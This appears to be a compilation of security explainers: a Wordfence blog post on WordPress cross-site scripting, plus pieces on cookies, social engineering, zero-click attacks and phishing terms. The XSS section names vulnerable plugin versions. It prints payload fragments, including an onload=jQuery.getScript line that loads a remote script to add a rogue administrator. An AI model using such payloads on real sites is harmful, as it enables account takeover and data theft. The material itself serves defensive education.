Cross-Site Scripting: The Real WordPress Supervillain

Vulnerabilities are a fact of life for anyone managing a website, even when using a well-established content management system like WordPress. Not all vulnerabilities are equal, with some allowing access to sensitive data that would normally be hidden from public view, while others could allow a malicious actor to take full control of an affected website. There are many types of vulnerabilities, including broken access control, misconfiguration, data integrity failures, and injection, among others. One type of injection vulnerability that is often underestimated, but can provide a wide range of threats to a website, is Cross-Site Scripting, also known as “XSS”. In a single 30-day period, Wordfence blocked a total of 31,153,743 XSS exploit attempts, making this one of the most common attack types we see.

XSS exploit attempts blocked per day

What is Cross-Site Scripting?

Cross-Site Scripting is a type of vulnerability that allows a malicious actor to inject code, usually JavaScript, into otherwise legitimate websites. The web browser being used by the website user has no way to determine that the code is not a legitimate part of the website, so it displays content or performs actions directed by the malicious code. XSS is a relatively well-known type of vulnerability, partially because some of its uses are visible on an affected website, but there are also “invisible” uses that can be much more detrimental to website owners and their visitors.

Without breaking XSS down into its various uses, there are three primary categories of XSS that each have different aspects that could be valuable to a malicious actor. The types of XSS are split into stored, reflected, and DOM-based XSS. Stored XSS also includes a sub-type known as blind XSS.

Stored Cross-Site Scripting could be considered the most nefarious type of XSS. These vulnerabilities allow exploits to be stored on the affected server. This could be in a comment, review, forum, or other element that keeps the content stored in a database or file either long-term or permanently. Any time a victim visits a location the script is rendered, the stored exploit will be executed in their browser.

An example of an authenticated stored XSS vulnerability can be found in version 4.16.5 or older of the Leaky Paywall plugin. This vulnerability allowed code to be entered into the Thousand Separator and Decimal Separator fields and saved in the database. Any time this tab was loaded, the saved code would load. For this example, we used the JavaScript onmouseover function to run the injected code whenever the mouse went over the text box, but this could easily be modified to onload to run the code as soon as the page loads, or even onclick so it would run when a user clicks a specified page element. The vulnerability existed due to a lack of proper input validation and sanitization in the plugin’s class.php file. While we have chosen a less-severe example that requires administrator permissions to exploit, many other vulnerabilities of this type can be exploited by unauthenticated attackers.

Example of stored XSS

Blind Cross-Site Scripting is a sub-type of stored XSS that is not rendered in a public location. As it is still stored on the server, this category is not considered a separate type of XSS itself. In an attack utilizing blind XSS, the malicious actor will need to submit their exploit to a location that would be accessed by a back-end user, such as a site administrator. One example would be a feedback form that submits feedback to the administrator regarding site features. When the administrator logs in to the website’s admin panel, and accesses the feedback, the exploit will run in the administrator’s browser.

This type of exploit is relatively common in WordPress, with malicious actors taking advantage of aspects of the site that provide data in the administrator panel. One such vulnerability was exploitable in version 13.1.5 or earlier of the WP Statistics plugin, which is designed to provide information on website visitors. If the Cache Compatibility option was enabled, then an unauthenticated user could visit any page on the site and grab the _wpnonce from the source code, and use that nonce in a specially crafted URL to inject JavaScript or other code that would run when statistics pages are accessed by an administrator. This vulnerability was the result of improper escaping and sanitization on the ‘platform’ parameter.

Example of blind XSS

Reflected Cross-Site Scripting is a more interactive form of XSS. This type of XSS executes immediately and requires tricking the victim into submitting the malicious payload themselves, often by clicking on a crafted link or visiting an attacker-controlled form. The exploits for reflected XSS vulnerabilities often use arguments added to a URL, search results, and error messages to return data back in the browser, or send data to a malicious actor. Essentially, the threat actor crafts a URL or form field entry to inject their malicious code, and the website will incorporate that code in the submission process for the vulnerable function. Attacks utilizing reflected XSS may require an email or message containing a specially crafted link to be opened by an administrator or other site user in order to obtain the desired result from the exploit. This XSS type generally involves some degree of social engineering in order to be successful and it’s worth noting that the payload is never stored on the server so the chance of success relies on the initial interaction with the user.

In January of 2022, the Wordfence team discovered a reflected XSS vulnerability in the Profile Builder – User Profile & User Registration Forms plugin. The vulnerability allowed for simple page modification, simply by specifically crafting a URL for the site. Here we generated an alert using the site_url parameter and updated the page text to read “404 Page Not Found” as this is a common error message that will not likely cause alarm but could entice a victim to click on the redirect link that will trigger the pop-up.

Example of reflected XSS

DOM-Based Cross-Site Scripting is similar to reflected XSS, with the defining difference being that the modifications are made entirely in the DOM environment. Essentially, an attack using DOM-based XSS does not require any action to be taken on the server, only in the victim’s browser. While the HTTP response from the server remains unchanged, a DOM-based XSS vulnerability can still allow a malicious actor to redirect a visitor to a site under their control, or even collect sensitive data.

One example of a DOM-based vulnerability can be found in versions older than 3.4.4 of the Elementor page builder plugin. This vulnerability allowed unauthenticated users to be able to inject JavaScript code into pages that had been edited using either the free or Pro versions of Elementor. The vulnerability was in the lightbox settings, with the payload formatted as JSON and encoded in base64.

Example of DOM-based XSS

How Does Cross-Site Scripting Impact WordPress Sites?

WordPress websites can have a number of repercussions from Cross-Site Scripting (XSS) vulnerabilities. Because WordPress websites are dynamically generated on page load, content is updated and stored within a database. This can make it easier for a malicious actor to exploit a stored or blind XSS vulnerability on the website which means an attacker often does not need to rely on social engineering a victim in order for their XSS payload to execute.

Using Cross-Site Scripting to Manipulate Websites

One of the most well-known ways that XSS affects WordPress websites is by manipulating the page content. This can be used to generate popups, inject spam, or even redirect a visitor to another website entirely. This use of XSS provides malicious actors with the ability to make visitors lose faith in a website, view ads or other content that would otherwise not be seen on the website, or even convince a visitor that they are interacting with the intended website despite being redirected to a look-alike domain or similar website that is under the control of of the malicious actor.

When testing for XSS vulnerabilities, security researchers often use a simple method such as alert() prompt() or print() in order to test if the browser will execute the method and display the information contained in the payload. This typically looks like the following and generally causes little to no harm to the impacted website:

Example of XSS popup

This method can also be used to prompt a visitor to provide sensitive information, or interact with the page in ways that would normally not be intended and could lead to damage to the website or stolen information.

One common type of XSS payload we see when our team performs site cleanings is a redirect. As previously mentioned, XSS vulnerabilities can utilize JavaScript to get the browser to perform actions. In this case an attacker can utilize the window.location.replace() method or other similar method in order to redirect the victim to another site. This can be used by an attacker to redirect a site visitor to a separate malicious domain that could be used to further infect the victim or steal sensitive information.

In this example, we used onload=location.replace("https://wordfence.com") to redirect the site to wordfence.com. The use of onload means that the script runs as soon as the element of the page that the script is attached to loads. Generating a specially crafted URL in this manner is a common method used by threat actors to get users and administrators to land on pages under the actor’s control. To further hide the attack from a potential victim, the use of URL encoding can modify the appearance of the URL to make it more difficult to spot the malicious code. This can even be taken one step further in some cases by slightly modifying the JavaScript and using character encoding prior to URL encoding. Character encoding helps bypass certain character restrictions that may prevent an attack from being successful without first encoding the payload.

Example of XSS redirect

When discussing manipulation of websites, it is hard to ignore site defacements. This is the most obvious form of attack on a website, as it is often used to replace the intended content of the website with a message from the bad actor. This is often accomplished by using JavaScript to force the bad actor’s intended content to load in place of the original site content. Utilizing JavaScript functions like document.getElementByID() or window.location() it is possible to replace page elements, or even the entire page, with new content. Defacements require a stored XSS vulnerability, as the malicious actor would want to ensure that all site visitors see the defacement.

Example of XSS defacement

This is, of course, not the only way to deface a website. A defacement could be as simple as modifying elements of the page, such as changing the background color or adding text to the page. These are accomplished in much the same way, by using JavaScript to replace page elements.

Stealing Data With Cross-Site Scripting

XSS is one of the easier vulnerabilities a malicious actor can exploit in order to steal data from a website. Specially crafted URLs can be sent to administrators or other site users to add elements to the page that send form data to the malicious actor as well as, or instead of, the intended location of the data being submitted on the website under normal conditions.

The cookies generated by a website can contain sensitive data or even allow an attacker to access an authenticated user’s account directly. One of the simplest methods of viewing the active cookies on a website is to use the document.cookie JavaScript function to list all cookies. In this example, we sent the cookies to an alert box, but they can just as easily be sent to a server under the attacker’s control, without even being noticeable to the site visitor.

Example of stealing cookies with XSS

While form data theft is less common, it can have a significant impact on site owners and visitors. The most common way this would be used by a malicious actor is to steal credit card information. It is possible to simply send input from a form directly to a server under the bad actor’s control, however it is much more common to use a keylogger. Many payment processing solutions embed forms from their own sites, which typically cannot be directly accessed by JavaScript running in the context of an infected site. The use of a keylogger helps ensure that usable data will be received, which may not always be the case when simply collecting form data as it is submitted to the intended location.

Here we used character encoding to obfuscate the JavaScript keystroke collector, as well as to make it easy to run directly from a maliciously crafted link. This then sends collected keystrokes to a server under the threat actor’s control, where a PHP script is used to write the collected keystrokes to a log file. This technique could be used as we did here to target specific victims, or a stored XSS vulnerability could be taken advantage of in order to collect keystrokes from any site visitor who visits a page that loads the malicious JavaScript code. In either use-case, a XSS vulnerability must exist on the target website.

Example of XSS form theft

If this form of data theft is used on a vulnerable login page, a threat actor could easily gain access to usernames and passwords that could be used in later attacks. These attacks could be against the same website, or used in credential stuffing attacks against a variety of websites such as email services and financial institutions.

Taking Advantage of Cross-Site Scripting to Take Over Accounts

Perhaps one of the most dangerous types of attacks that are possible through XSS vulnerabilities is an account takeover. This can be accomplished through a variety of methods, including the use of stolen cookies, similar to the example above. In addition to simply using cookies to access an administrator account, malicious actors will often create fake administrator accounts under their control, and may even inject backdoors into the website. Backdoors then give the malicious actor the ability to perform further actions at a later time.

If a XSS vulnerability exists on a site, injecting a malicious administrator user can be light work for a threat actor if they can get an administrator of a vulnerable website to click a link that includes an encoded payload, or if another stored XSS vulnerability can be exploited. In this example we injected the admin user by pulling the malicious code from a web-accessible location, using a common URL shortener to further hide the true location of the malicious location. That link can then be utilized in a specially crafted URL, or injected into a vulnerable form with something like onload=jQuery.getScript('https://bit.ly/<short_code>'); to load the script that injects a malicious admin user when the page loads.

Example of adding a malicious admin user with XSS

Backdoors are a way for a malicious actor to retain access to a website or system beyond the initial attack. This makes backdoors very useful for any threat actor that intends to continue modifying their attack, collect data over time, or regain access if an injected malicious admin user is removed by a site administrator. While JavaScript running in an administrator’s session can be used to add PHP backdoors to a website by editing plugin or theme files, it is also possible to “backdoor” a visitor’s browser, allowing an attacker to run arbitrary commands as the victim in real time. In this example, we used a JavaScript backdoor that could be connected to from a Python shell running on a system under the threat actor’s control. This allows the threat actor to run commands directly in the victim’s browser, allowing the attacker to directly take control of it, and potentially opening up further attacks to the victim’s computer depending on whether the browser itself has any unpatched vulnerabilities.

Often, a backdoor is used to retain access to a website or server, but what is unique about this example is the use of a XSS vulnerability in a website in order to gain access to the computer being used to access the affected website. If a threat actor can get the JavaScript payload to load any time a visitor accesses a page, such as through a stored XSS vulnerability, then any visitor to that page on the website becomes a potential victim.

Example of a XSS backdoor

Tools Make Light Work of Exploits

There are tools available that make it easy to exploit vulnerabilities like Cross-Site Scripting (XSS). Some tools are created by malicious actors for malicious actors, while others are created by cybersecurity professionals for the purpose of testing for vulnerabilities in order to prevent the possibility of an attack. No matter what the purpose of the tool is, if it works malicious actors will use it. One such tool is a freely available penetration testing tool called BeEF. This tool is designed to work with a browser to find client-side vulnerabilities in a web app. This tool is great for administrators, as it allows them to easily test their own webapps for XSS and other client-side vulnerabilities that may be present. The flip side of this is that it can also be used by threat actors looking for potential attack targets.

One thing that is consistent in all of these exploits is the use of requests to manipulate the website. These requests can be logged, and used to block malicious actions based on the request parameters and the strings contained within the request. The one exception is that DOM-based XSS cannot be logged on the web server as these are processed entirely within the victim’s browser. The request parameters that malicious actors typically use in their requests are often common fields, such as the WordPress search parameter of $_GET[‘s’] and are often just guesswork hoping to find a common parameter with an exploitable vulnerability. The most common request parameter we have seen threat actors attempting to attack recently is $_GET[‘url’] which is typically used to identify the domain name of the server the website is loaded from.

Top 10 parameters in XSS attacks

Conclusion

Cross-Site Scripting (XSS) is a powerful, yet often underrated, type of vulnerability, at least when it comes to WordPress instances. While XSS has been a long-standing vulnerability in the OWASP Top 10, many people think of it only as the ability to inject content like a popup, and few realize that a malicious actor could use this type of vulnerability to inject spam into a web page or redirect a visitor to the website of their choice, convince a site visitor to provide their username and password, or even take over the website with relative ease all thanks to the capabilities of JavaScript and working knowledge of the backend platform.

One of the best ways to protect your website against XSS vulnerabilities is to keep WordPress and all of your plugins updated. Sometimes attackers target a zero-day vulnerability, and a patch is not available immediately, which is why the Wordfence firewall comes with built-in XSS protection to protect all Wordfence users.

Source: https://www.wordfence.com/blog/2022/09/cross-site-scripting-the-real-wordpress-supervillain

What Do Those Pesky ‘Cookie Preferences’ Pop-Ups Really Mean?

We asked the engineer who invented cookies what they mean and how to handle them.

YOU ARE NOT the only person irritated by those pesky cookie permissions boxes. If you click “Accept” by rote, you have no idea what you’re agreeing to. Or perhaps you don’t care? Many users think they have to accept all cookies to access the website, but that’s not always the case. Another option is to manage your cookies, but what does that even mean?

To find out, we spoke to Lou Montulli, the engineer who invented cookies at age 23.

“I’m just like everybody else,” says Montulli. “I want that pop-up to go away as soon as possible. The idea of asking people about permissions every single time they go to a website is annoying.”

Every website you visit places cookies on your browser. The purpose of the cookie is to allow a website to recognize a browser. That’s why you can return to a site and be recognized, even if you don’t always log in. It’s why the stuff in your shopping cart is still there the next day, or that article remembers where you stopped reading. You don’t have to “introduce” yourself every time you visit a site, but is the convenience worth it?

With Montulli’s help, here are some of the most frequently used terms those annoying permissions boxes are asking you about, and what you might want to choose when you see them.

Common Terms

First, let’s explain what some of the types of cookies you’ll see really do:

  • Session Cookies are temporary. These aren’t saved when you quit your browser.
  • Persistent Cookies will stay on your hard drive until you delete them, or your browser does. These have an expiration date written into their code. That expiration date varies depending on the site or service that issued them and is chosen by the website that places them on your browser.
  • First-Party Cookies are those placed directly onto your device by the website you’re visiting.
  • Third-Party Cookies are placed on your device but not by the website you’re on, aka the first party. Instead, they’re put onto your device by advertisers, data partners, or any analytics tools that track visitors (usually at the request of that first party. Think Google Analytics for your favorite tech magazine website, for example.)
  • Strictly Necessary Cookies allow you to view a website’s content and use its features.
  • Preference Cookies, aka Functionality Cookies, allow a website to remember data you typed: for example, your user ID, password, delivery address, email, phone, and preferred method of payment.
  • Statistics Cookies, aka Performance Cookies, record how you used a website. Although these see links clicked and pages visited, your identity is not attached to these stats. These can include cookies from a third party. So if a website uses an analytics system from a third party to track what visitors do on that first-party website, it only divulges that tracking info to the website that hired the third party for analytics.

What Am I Supposed to Choose? Does It Matter?

Montulli refers to the pop-up permissions box as “a really silly idea.” His preference would be a much more efficient and technical solution. For example, a user could choose their cookie preferences once in their browser, and every website they visit would honor that choice, similar to the design of Do Not Track. Montulli explained it like this: “Say I want to accept one type of cookie, but not that other cookie, or those cookies, any website could just ask the browser once what any user’s preferences are.” One and done.

That would be better, but what happens when you click “Accept All”—aside from thoughts like, Why does every website keep asking me these questions?

What many people (especially Americans) may not know is that in 2018, the European Union (EU) passed the General Data Protection Regulation (GDPR). And even if they have heard of it, they may not know enough to understand that this law is partially why cookie permission boxes are becoming more prevalent.

As part of GDPR, companies based outside Europe can be hit with enormous fines if they track and analyze EU visitors to their website. In other words, say your company resides in New York, but that company has European visitors and customers, or collects their data. If that’s the case, they can be penalized to the tune of tens of millions in fines if they don’t disclose their data collection and obtain the user’s consent.

Understandably, American companies want to avoid huge fines, which is why US users are seeing more and more of these permission boxes.

The boxes are designed to offer users more control over their data, as the EU law was put into place to protect all data belonging to EU citizens and residents. The confusion within the US market exists because the country doesn’t have similar laws to protect the privacy of its citizens.

In February 2022, Saryu Nayyar wrote a piece for Forbes that asks if it’s time for a US version of GDPR. Nayyar wrote that the point of such a law would be “gaining explicit consent for collecting data and deleting data if consent is withdrawn.” That sounds like an awesome idea, but after consulting Montulli, the privacy plot thickens.

Personally, I find it impossible to separate cookies and privacy online. I asked Montulli if it’s true that everything on the internet stays on the internet.

“No,” he says. That’s because information on the internet is detached from your current online presence. The purpose of the cookie is to allow a website to know when the same browser returns. The cookie may contain additional pieces of information. “But the predominant use of it is to pass an ID to your browser as an identifier,” he says.

Source: https://www.wired.com/story/what-do-cookie-preferences-pop-ups-mean/

Why Cybercrime is like Trout Fishing

“Why push on a locked door when there’s an open window?”

As any seasoned fly angler knows, trout are highly selective, continuous feeders with their entire survival strategy centered on conserving energy, remaining close to a safe holding place, and gaining maximum protein intake with minimal movement. To fool the wily trout, fly angler have developed a practice of “matching the hatch” is used by fly anglers to present an artificial fly that most resembles what the trout are currently feeding on and getting it close to where a feeding trout is holding. And often, with the right presentation, the trout is fooled and hooked.

So what does fly fishing have to do with cyber security?

In many ways, cyber criminals behave exactly like seasoned fly anglers. Rarely do they waste time, energy and resources bombarding a company’s firewall. Or in the case of fly fishing, randomly cast using any fly pattern available. And as cybercrime becomes more sophisticated and controlled by criminal gangs and nation states, they favor a targeted approach. Cybercriminals today look for the easiest and quickest way through a company’s security defenses, often focusing on individual employees using an approach called social engineering.

Cybercriminals, like fly anglers, look for the easiest way to fool their target.  And in today’s disrupted business world that seems to be employees working from home, where in most cases the home environment is far less secure than the office IT environment. They also, like a fly angler matching the hatch, impersonate senior executives demanding a lower-level employee (for example from the finance department) wire money immediately to an (fake) client account. All too often the employee, when receiving an urgent email from a named senior executive, complies.

The savvy trout angler spends a great deal of time understanding the trout species they are targeting, the river environment, the types of insect life and potential food sources, most active feeding times etc. They even visit nearby fly shops and talk with knowledgeable fishing guides for specific information. They build a knowledge base used to match the hatch and fool the trout.

 In a similar way, a cybercriminal spends a great amount of time researching the company they are targeting. They scour LinkedIn profiles, search company websites for the names and titles of employees, gather information about employees on Facebook, Tinder, Instagram, Snapchat and other social media platforms. Recently they have begun to telephone employees at home pretending to be a legitimate research company, even offering cash for answering survey questions. In many cases, employee emails and other confidential information can be purchased from other criminal groups on the Dark Net. Using all this information they put together a list of potential employees to target with Phishing emails and social engineering.

Trout anglers know that older and larger trout are more “educated” in spotting real food from an anglers imitation. Older trout have probably seen numerous presentations from lots of different anglers and learned to be wary and highly selective. Also, the clearer the water, the more wary the trout are in general to protect themselves from predators. Smaller, younger trout have yet to learn and are easier to fool. 

Cybercriminals know that new employees are easier to fool as well. This is especially true when cyber security training is minimal and there is little peer to peer education about what to watch out for when it comes to email phishing and social engineering. And working from home has in most cases reduced the amount of team learning and peer to peer interactions, which provide a safe place for new employees to ask questions and seek advice. In many training classes few employees want to be singled out for asking “naïve” questions.

A Human Approach to Mitigating Cybercrime

To blunt the growing impact of cybercrime, companies need to focus more on the human aspect of cyber security. In most organizations, 98% of the cyber security budget is spent on technology and less than 2% on employees. Yet 88% of cyber breaches are the result of human error, poor cyber hygiene, mismanagement, and insider actions. Just 12% of breaches are due to technology failures. And 61% of cyber victims fail to report the incident. 

The analogy between fly fishing and cybercrime offers many opportunities for companies to improve their cyber security. For example, clarity of water in a trout stream is easily equated with open transparency and cross-functional communications in the corporate world. Learning from others, on-going communications about attempted cyberattacks and successful breaches allows everyone to learn quickly and become more aware and accountable. Having the IT department help secure the home technology and internet environment of senior executives, Board Directors and other high value targets helps prevent breaches and high-value-employee data mining by cyber criminals. Adding additional support for the cyber security and IT team to improve and keep on top of cyber hygiene, patches and software upgrades can go a long way in mitigating cyber risks.

Cyber security is the number one threat to businesses and organizations everywhere. Between 2020 and 2021, ransomware attacks increased by 60%, with the average ransomware payment approaching $4.5 million (IBM). And that’s just the payment to the hackers. The cost of downtime, lost revenue, reputational damage and decline in market value is nearly 10 times the ransom payment.

It is past time senior leaders prioritize the human firewall. Otherwise cybercrime will continue to grow and pose an ever growing threat to our global economy and way of life.

Source: https://www.linkedin.com/pulse/why-cybercrime-like-trout-fishing-john-r-childress/?trk=public_post

Zero-click attacks explained, and why they are so dangerous

Zero-click attacks, especially when combined with zero-day vulnerabilities, are difficult to detect and becoming more common.

Zero-click attack definition

Zero-click attacks, unlike most cyberattacks, don’t require any interaction from the users they target, such as clicking on a link, enabling macros, or launching an executable. They are sophisticated, often used in cyberespionage campaigns, and tend to leave very few traces behind—which makes them dangerous.

Once a device is compromised, an attacker can choose to install surveillance software, or they can choose to enact a much more destructive strategy by encrypting the files and holding them for ransom. Generally, a victim can’t tell when and how they’ve been infected through a zero-click attack, which means users can do little to protect themselves.

How zero-click attacks work

Zero-click attacks have become increasingly popular in recent years, fueled by the rapidly growing surveillance industry. One of the most popular spyware is NSO Group’s Pegasus, which has been used to monitor journalists, activists, world leaders, and company executives. While it’s not clear how each victim was targeted, it is believed that at least a few of them have received a WhatsApp call they didn’t even have to answer.

Messaging apps are often targeted in zero-click attacks because they receive large amounts of data from unknown sources without requiring any action from the device owner. Most often, the attackers exploit a flaw in how data is validated or processed.

Other less-known zero-click attack types have stayed under the radar, says Aamir Lakhani, cybersecurity researcher at Fortinet’s FortiGuard Labs. He gives two examples: parser application exploits (“while a user views a picture in a PDF or a mail application, the attacker is silently exploiting a system without user clicks or interaction needed”) and “WiFi proximity attacks that seek to find exploits on a WiFi stack and upload exploit code into [the] user’s space [in the] kernel to remotely take over systems.”

Zero-click attacks often rely on zero-days, vulnerabilities that are unknown to the software maker. Not knowing they exist, the maker can’t issue patches to fix them, which can put users at risk. “Even very alert and aware users cannot avoid those double-whammy zero-day and zero-click attacks,” Lakhani says.

These attacks are often used against high-value targets because they are expensive. “Zerodium, which purchases vulnerabilities on the open market, pays up to $2.5M for zero-click vulnerabilities against Android,” says Ryan Olson, vice president of threat intelligence, Unit 42 at Palo Alto Networks.

Examples of zero-click attacks

The target of a zero-click attack can be anything from a smartphone to a desktop computer and even an IoT device. One of the first defining moments in their history happened in 2010 when security researcher Chris Paget demonstrated at DEFCON18 how to intercept phone calls and text messages using a Global System for Mobile Communications (GSM) vulnerability, explaining that the GSM protocol is broken by design. During his demo, he showed how easy it was for his international mobile subscriber identity (IMSI) catcher to intercept the mobile phone traffic of the audience.

Another early zero-click threat was discovered in 2015 when the Android malware family Shedun took advantage of the Android Accessibility Service’s legitimate functions to install adware without the user doing anything. “By gaining the permission to use the accessibility service, Shedun is able to read the text that appears on screen, determine if an application installation prompt is shown, scroll through the permission list, and finally, press the install button without any physical interaction from the user,” according to Lookout.

A year later, in 2016, things got even more complicated. A zero-click attack was implemented into the United Arab Emirates surveillance tool Karma, which took advantage of a zero-day found in iMessage. Karma only needed a user’s phone number or email address. Then, a text message was sent to the victim, who didn’t even have to click on a link to be infected.

Once that text arrived on an iPhone, the attackers were able to see photos, emails, and location data, among other items. The hacking unit that used this tool, dubbed Project Raven, included U.S. intelligence hackers who helped the United Arab Emirates monitor governments and human rights activists.

By the end of that decade, zero-click attacks were being noticed more often, as surveillance companies and nation-state actors started to develop tools that didn’t require any action from the user. “Attacks that we were previously seeing through links in SMS, moved to zero-click attacks by network injections,” says Etienne Maynier, technologist at Amnesty International.

Amnesty and the Citizen Lab worked on several cases involving NSO Group’s Pegasus spyware, which was linked to several murders, including that of the Washington Post journalist Jamal Khashoggi. Once installed on a phone, Pegasus can read text messages, track calls, monitor a victim’s location, access the device’s mic and camera, collect passwords, and gather information from apps.

Khashoggi and his close ones were not the only victims. In 2019, a flaw in WhatsApp was exploited to target civil society and political figures in Catalonia. The attack started with a video call made on WhatsApp to the victim. Answering the call wasn’t necessary, as the data sent to the chat app wasn’t sanitized properly. This allowed the Pegasus code to be executed on the target device, effectively installing the spyware software. WhatsApp has since patched this vulnerability and has notified 1,400 users who have been targeted.

Another sophisticated zero-click attack associated with NSO Group’s Pegasus was based on a vulnerability in Apple’s iMessage. In 2021, Citizen Lab found traces of this exploit being used to target a Saudi activist. This attack relies on an error in the way GIFs are parsed in iMessage and disguises a PDF document containing malicious code as a GIF. In its analysis of the exploit, Google Project Zero stated, “The most striking takeaway is the depth of the attack surface reachable from what would hopefully be a fairly constrained sandbox.” The iMessage vulnerability was fixed on September 13, 2021, in iOS 14.8.

Zero-click attacks don’t only target phones. In 2021, a zero-click vulnerability gave unauthenticated attackers full control over Hikvision security cameras. Later the same year, a flaw in Microsoft Teams was proved to be exploitable through a zero-click attack that gave hackers access to the target device across major operating systems (Windows, MacOS, Linux).

How to detect and mitigate zero-click attacks

Realistically, knowing if a victim is infected is quite tricky, and protecting against a zero-click attack is almost impossible. “Zero-click attacks are way more common than we thought,” says Maynier. He recommends potential targets encrypt all their data, update their devices, have strong passwords, and do everything in their power to protect their digital lives. There’s also something else he tells them: “Consider that they may be compromised and adapt to that.”

Still, users can do a few things to minimize the risk of being spied on. The simplest one is to restart the phone periodically if they own an iPhone. Experts at Amnesty have shown that this could potentially stop Pegasus from working on iOS—at least temporarily. This has the advantage of disabling any code running that has not achieved persistence. However, the disadvantage is that rebooting the device may erase the signs that an infection has occurred, making it much harder for security researchers to determine whether a device has been targeted with Pegasus.

Users should also avoid jailbreaking their devices, because it removes some of the security controls that are built into the firmware. In addition to that, since they can install unverified software on a jailbroken device, this opens them up to installing vulnerable code that might be a prime target for a zero-click attack.

As always, maintaining good security hygiene can help. “Segmentation of networks, applications, and users, use of multifactor authentication, use of strong traffic monitoring, good cybersecurity hygiene, and advanced security analytics may prove to slow down or mitigate risks in specific situations,” says Lakhani. “[These] will also make post-exploitation activities difficult for attackers, even if they do compromise [the] systems.”

Maynier adds that high-profile targets should segregate data and have a device only for sensitive communications. He recommends users keep “the smallest amount of information possible on their phone (disappearing messages are a very good tool for that)” and leave it out of the room when they have important face-to-face conversations.

Organizations such as Amnesty and Citizen Lab have published guides instructing users to connect their smartphone to a PC and check to see whether they have been infected with Pegasus. The software used for this, Mobile Verification Toolkit, relies on known Indicators of Compromise such as cached favicons and URLs present in SMS messages. A user does not have to jailbreak their device to run this tool.

Also, Apple and WhatsApp have both sent messages to people who might have been targeted by zero-click attacks that aimed to install Pegasus. After that, some of them reached out to organizations such as Citizen Lab to further analyze their devices.

Yet technology alone won’t solve the problem, says Amnesty’s Maynier. “This is ultimately a question of policy and regulation,” he adds. “Amnesty, EDRi and many other organizations are calling for a global moratorium on the use, sale, and transfer of surveillance technology until there is a proper human rights regulatory framework in place that protects human rights defenders and civil society from the misuse of these tools.”

The policy answers will have to cover different aspects of this problem, he says, from export control to mandatory human rights due diligence for companies. “We need to put a stop on these widespread abuses first,” Maynier adds.

Source: https://www.csoonline.com/article/3660055/zero-click-attacks-explained-and-why-they-are-so-dangerous.html

Definition: Credential Stuffing

A hacking technique where login credentials are obtained (often stolen) from one site and used to attempt to log into one or more other services – typically higher value sites like banks, credit cards, etc.

This is why we recommend that you never re-use passwords.

The video below gives a pretty clear explanation of the problem, and offers some ways around it (password managers, multi-factor authentication, passwordless login). We’ll be covering passwordless login soon…

Definition: Ransomware

Ransomware is a form of malware that encrypts a victim’s files. The attacker then demands a ransom from the victim to restore access to the data upon payment. 

Users are shown instructions for how to pay a fee to get the decryption key. The costs can range from a few hundred dollars to thousands, typically payable to cybercriminals in hard to trace cryptocurrency such as Bitcoin.

Definition: Consent Phishing

A “consent phishing” scam is an attempt by adversaries to get employees to install a malicious application and/or grant it permissions that will allow it to access sensitive data or perform unwanted functions.

This type of consent phishing relies on the OAuth 2.0 authorization technology. By implementing the OAuth protocol into an app or website, a developer gives a user the ability to grant permission to certain data without having to enter their password or other credentials.

Used by a variety of online companies including Microsoft, Google, and Facebook, OAuth is a way to try to simplify the login and authorization process for apps and websites through a single sign-on mechanism. However, as with many technologies, OAuth can be used for both beneficial and malicious purposes.

Microsoft details the problem step by step in its blog post:

  1. An attacker registers an app with an OAuth 2.0 provider.
  2. The app is configured in a way that makes it seem trustworthy, such as using the name of a popular product used in the same ecosystem.
  3. The attacker gets a link in front of users, which may be done through conventional email-based phishing, by compromising a non-malicious website, or through other techniques.
  4. The user clicks the link and is shown an authentic consent prompt asking them to grant the malicious app permissions to data.
  5. If a user clicks Accept, they grant the app permissions to access sensitive data.
  6. The app gets an authorization code, which it redeems for an access token, and potentially a refresh token.
  7. The access token is used to make API calls on behalf of the user.
  8. The attacker can then gain access to the user’s mail, forwarding rules, files, contacts, notes, profile, and other sensitive data.

“Part of the problem is that most users don’t understand what is happening,” Roger Grimes, data driven defense evangelist at KnowBe4 said. “They don’t know that a sign-on that they’ve used with Gmail, Facebook, Twitter or some other OAuth provider is now automatically being called and used or abused by another person. They don’t understand the permission prompts either. All they know is they clicked on an email link or an attachment and now their computer system is asking them to confirm some action that they really don’t understand.”

Definition: Fleeceware

Fleeceware:  Apps which are marketed as “free”, but which then trick the user into subscribing for paid services (which are available free elsewhere), often for excessive fees.

Common examples are horoscope apps, QR code or barcode scanners, and face filter apps targeted at younger users. Publishers of fleeceware target users who may be less cognizant or sensitive to initial fees and reoccurring charges.

Often users are hooked in by free trials, which turn out to be difficult to extricate yourself from after the “free” period has lapsed.

These are currently most common on phone apps (both iPhone and Android), but the same techniques can be found with some desktop applications as well.

Definition: Watering-hole campaigns

Watering-hole campaigns make use of malicious websites that lure visitors in with targeted content – cyberattackers often post links to that content on discussion boards and on social media to cast a wide net. When visitors click through to a malicious website, background code will then infect them with malware.

SSL Security Certificates and https://

What is an SSL Certificate and what does it do for me?

An SSL Certificate allows your site to serve your data – and receive input from visitors – in an encrypted form.  This means that if either side is sending sensitive data, it becomes extremely difficult for anyone else to see what is being sent. It’s an important tool to thwart Man-In-The-Middle attacks.

The https:// part of an address (also called “Secure Sockets Layer” or SSL) merely signifies the data being transmitted back and forth between your browser and the site is encrypted and cannot be read by third parties.

We’re advised to never send sensitive information to a website which does not have the https:// and a padlock icon on the address line, as pretty much anyone can read it if they know how.

However, security expert Brian Krebs points out that the presence of “https://” or a padlock in the browser address bar does not mean the site is legitimate, nor is it any proof the site has been security-hardened against intrusion from hackers.

Here’s a sobering statistic: According to PhishLabsby the end of 2019 roughly three-quarters (74 percent) of all phishing sites were using SSL certificates.

The reason Mr. Krebs brings this up is that “many U.S. government Web sites now carry a message prominently at the top of their home pages meant to help visitors better distinguish between official U.S. government properties and phishing pages. Unfortunately, part of that message is misleading and may help perpetuate a popular misunderstanding about Web site security and trust that phishers have been exploiting for years now.”

The problem is that those government sites are misinforming the public, including statements such as “The https:// ensures that you are connecting to the official website….”

No, it does NOT.

All it ensures is that you’re connecting to a site which has an SSL Certificate in place. It’s not particularly difficult to obtain a .gov domain name, and it’s a fairly trivial exercise these days to get a basic SSL Certificate.  So all that the https:// on a .gov site ensures is that someone got a .gov domain name and put an SSL Cert on it – nothing more.

The moral?  Make sure you’re going to the right site!  Both for government anything else you do online.

Original article at Krebs On Security